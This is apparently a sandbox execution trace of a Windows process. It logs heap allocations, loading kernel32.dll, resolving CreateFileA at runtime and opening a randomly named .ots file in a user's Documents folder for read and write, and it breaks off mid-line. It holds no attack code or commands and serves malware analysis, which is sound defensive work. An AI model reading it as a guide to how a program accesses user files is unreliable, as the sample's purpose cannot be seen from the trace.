[0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.307] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.310] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8e8 [0179.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.310] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0179.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.311] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0179.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0179.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0179.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpUsedDefaultChar=0x0) returned 82 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.313] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\t8zo.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=82, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa4) returned 0x8fcbc0 [0179.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=82, lpWideCharStr=0x8fcbc0, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots") returned 82 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.316] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | 